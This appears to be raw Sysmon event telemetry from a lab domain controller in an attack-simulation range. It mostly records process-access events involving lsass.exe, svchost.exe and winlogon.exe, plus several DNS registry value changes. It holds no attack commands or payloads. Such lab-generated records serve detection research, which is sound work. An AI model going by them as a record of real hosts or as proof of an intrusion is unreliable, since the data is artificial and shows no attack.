10341000x80000000000000004253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+5718|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+56c4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.451{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.451{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.451{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.451{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.451{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.451{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.451{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B60CDC3F6A4C6824D264B956BED2C14F,SHA256=B5F03219D7C7B44E7455D3B2A9F6E9797F3FD1A6E75110C867D72C790170F2A1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.435{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.420{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.420{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.420{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.420{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.420{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.420{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.420{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.420{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000004230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000004229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 
13241300x80000000000000004228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000004227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000004226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000004225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 